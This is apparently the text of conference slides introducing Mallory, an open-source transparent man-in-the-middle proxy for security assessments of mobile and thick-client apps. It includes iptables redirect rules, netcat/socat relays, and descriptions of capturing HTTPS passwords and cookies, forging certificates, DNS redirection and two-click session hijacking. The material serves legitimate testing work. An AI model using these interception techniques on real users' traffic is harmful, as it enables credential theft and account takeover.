Who are we? Jeremy Allen Rajendra Umadas
What do we do? Black box Mobile App
Assessments, Thick Clients, Web apps
Why Mallory Exists?
Proxy setups for apps Throwaway tools that
are all similar
“Scratching the Itch…” Introducing: Mallory Architecture/Design Open Source Tool
Demos
2
*Updated Slides: http://intrepidusgroup.com/insight/mallory
Youngin’ of the group
Bitten by security bug in college
Mobile Application Security == fun Legacy Bugs
First (of many) Black Hats
5
Mobile App AssessmentsQUALCOMM/BREW, RIM, WinMo, iPhone, Android
Other devices and product assessments (closed devices)
Assess applications ON the device as delivered
Network focused attacks requiredWeb Application AssessmentsX$$ -- It pays the bills.
Blackboxy-stuffThick client apps/plugins that talk somehow
Binary protocols
8
Mobile Applications and Thick Clients
Often just a thick client using HTTP to transport data
Web Applications
May not be real HTTP (AMF, Other HTTP encapsulated binary protocols)
Example: Video on Demand with HTTP Pipelining – broke most proxies in some way
9
The above targets sometimes use proprietary transport protocols.
It may be hard to force a thick client or mobile app to tunnel data through HTTP proxy even if they use HTTP for transport
Web Apps may use ActiveX, Flash, or various other modules that add non-standard traffic
10
“Roll your own” clients
Many small scripts per engagement
Throwaway code per-engagement
Someone else wrote the proxy and we can’t change the code easily
12
It’s not using HTTP.. what is it ?
Binary protocols
Multiple streams stuffed into one SSL socket
Example: SSL protected phone applications, SSL VPNs
13
Gather Data Figure out what we need
Server IP(s)
Server Port(s)
TCP or UDP?
Buffer sizes???
Any other anomalous characteristics
14
-A PREROUTING -i eth1 -p tcp -m tcp --dport80 -j REDIRECT --to-ports 1231
-A PREROUTING -i eth1 -p tcp -m tcp --dport443 -j REDIRECT --to-ports 1232
-A PREROUTING -i eth1 -p tcp -m tcp --dport4356-j REDIRECT --to-ports 1233
19
netcat
nc -l -p 1231 | nc host 80
nc -l -p 1232 | nc host 443
nc -l -p 1233 | nc host 4356
socat
socat -v -v -x tcp-listen:80 host:80
20
21
Use scripting language to manipulate traffic in *cat setup (Python, Ruby, Perl, Whatever)
Tool is often very specific to application being assessed
Requires touchy sniffing, routing, NAT, IPTablesand black magic to get it all flowing properly
Brittle
When they just want to make our lives difficult
Rube Goldberg
No one tool solves the problem very generically Tools work well, just don’t meet some specific specifications
(Buffer size, platform intricacies,…)
Common problem that app assessors must solve in a slightly different manner per application and environment
Time to hack it together OR we solve it once generically for the majority of cases (We are lazy)
22
Existing Proxies: Web Scarab, Burp, Paros, PFI, others.
Need to configure application and the proxy for full duplex communication
HTTP proxies don’t always work: NTP, FTP, SSH, SMTP, others
Limitations:▪ Application might not support proxy setting
▪ Manual configuration of proxy endpoint
▪ May still require fancy IPTables, DNS and other control means
23
Transparent aware proxy for TCP and UDP
Decode Protocols
GUI Based “Debugger”
Rule system▪ Edited in a file or in the GUI
▪ Modify traffic on the fly
▪ Determine what traffic is sent to the debugger
26
Acknowledgements
▪ Mike Zusman (EvProxy)
▪ Aaron Rhodes
▪ Rajendra Umadas (Shaboopi)
▪ Jeremy Allen (Mallory)
▪ Adam Pridgen
▪ Others!
Team provided testing, ideas and code!
27
Protocols▪ Currently knows: HTTP, HTTPS, SSL, DNS and SSH▪ Easy to implement new protocols
Plugins▪ Per protocol▪ HTTP and HTTPS well supported at this point▪ Extensible platform for all MiTM needs on supported
protocols
Proxification of Traffic▪ Can turn of transparency awareness and force traffic to an
external proxy
28
Released right now
Available on bitbucket▪ bitbucket.org/IntrepidusGroup/mallory
Mallory requires root privileges and an entire machine: we use it as a virtual machine mainly.
Mallory is also readily usable as a malicious access point (and many applications necessitate this approach)
31
Python2.6, python2.6-dev python-setuptools python-pyasn1 python-netfilter libnetfilter-conntrack-dev pynetfilter_conntrack netfilter-extensions-source libnetfilter-conntrack3-dbg libnetfilter-conntrack1_0.0.99-1_i386.deb python-paramiko (http://software.inl.fr/trac/wiki/pynetfilter_conntrack)
32
Application Transparent Aware
Extensible ProgrammaticInstream Modification
Manual Instream Modification
Non-HTTP
Mallory X X X X X
Burp (HTTP Proxies)
X
PFI X X X
Cain and Abel
X
Middler X X
Ettercap X X X
Netsed X X
Squid X * X
33
Mallory is a standard UDP and TCP server
Two threads per MiTM connection (one for the source and one for the destination)
Traffic Directions “C2S” = Client to Server “S2C” = Server to Client
Plugins are called in the middle of the shovel at the right spots per protocol
34
Use mercurial and bitbucket to get the tool
* hg clone https://[email protected]/IntrepidusGroup/mallory
After hg checkout
Read SETUP README
35
Options
No transparent
▪ Change listen port
▪ Specify the protocol to use
▪ Removes root and kernel dependencies
Specify the traffic database
Proxify (Send to some other destination)
36
-d / –trafficdb
Specify the traffic database name, default is "trafficdb”SQLITE databases are used.
-p / --protoSpecify the protocol to use. This is only useful with the no-
transparent option. You must specify the module inside of the protocol package as well as the exact protocol class to instantiate.
Example: -p sslproto.SSLProtocol or -p ssh.SSHProtocol or -p http.HTTP
37
TABLE: connections
connCount INTEGER – Uniquely identifies a TCP Stream in this database. Usedto JOIN on from flows table
serverIp TEXT,serverPort INTEGER : Original destination where packet is going (pre-REDIRECT)
clientIp TEXT, clientPort INTEGER (Victim client)
TABLE: flowsActual data in connectionsBuffer sizes of real connection are preserved.
conncount INTEGER: Unique ID for this flow maps to connectionsdirection TEXT,: “c2s” / “s2c”buffindex INTEGER: Increasing number for this streamtimestamp FLOAT,: Seconds since epoch.buffer BLOB: The actual data received.
38
TABLE: dgram : for UDP “connectionless” data
saddr : IP Address in normal dotted quad formatsport: Integer source port
daddr : IP Addres in dotted quad
dport INTEGER:destination port
direction TEXT : “c2s” or “s2c”
body BLOB: The actual data contained in the packettimestamp: seconds since the epoch
39
“Debugging Clients” use XMLRPC to Talk to the Mallory server
Mallory has a GUI interface and a prototype style CLI interface
CLI is just to show how to interact with the GUI
40
Protocol decoding implementations
Plugins are how we want everyone to extend existing protocols
Plugins and Protocols are clean abstractions
We tried hard to make this neat and tidy
We already use this and write custom protocols and plugins for engagements
TODO: Documentation (coming to a bitbucketrepository near you)
42
SSH MiTM
Overview of Python Paramiko
Things we will be doing soon: Port Forwarding
Logging of SSH data
44
I hacked your bank (HTTPS)
All your passwords and cookies are captured by mallory
Mobile apps like HTTP. HTTP is EVERYWHERE
Custom logging of HTTP data
45
Walk through a stream editing scenario
Walk through rule editing and explain the rule system in more detail if we need to
Show stream editing
46
Show how cool rules are: MuckPipe! show off the gzipstripper and then replace something.
Replaces NetSed – can be modified in the rule GUI
Autosend and rules make it easy to get to the data you need
Show command line version and in the GUI
Show GZIP / Deflate removal
Show VNC hax
47
Quick code walkthrough of why HTTPS and the architecture is beautiful
Show how we generate certificates on the fly and why that is cool
Future: Zero byte size, on the fly, in memory certificates
48
HTTP -- Session Hijacking
Show off the sexy chrome hijacking plugin
Capture session data Visit Site Pwn
Useful for mobile apps we then want to load a real browser
And.. Of course.. It is session hijacking in two clicks
Explain SOP and why we used a plugin
Show some more code! Less than one hundred lines of code for the Mallory part
49
HTTP – Image Inversion
You may have already seen this ;-)
Very neat because it is a very simple plugin –Show case the ease of implementing this plugin. Make anyone feel like they can write a Mallory plugin
50
Most applications use DNS to find their target server
We can use our DNS A-Record lookup module to easily send it to an internal server
Future: Make this a plugin, as it should be. Integrate this into the GUI. Not done yet because it is something that gets changed once
51
Mallory: Generic TCP and UDP MiTMproxy
Extensible, versatile, open source. Blog:
http://intrepidusgroup.com/insight twitter.com/intrepidusgroup Keep up on the project here: http://bitbucket.org/IntrepidusGroup/mallory
http://intrepidusgroup.com/insight/mallory
52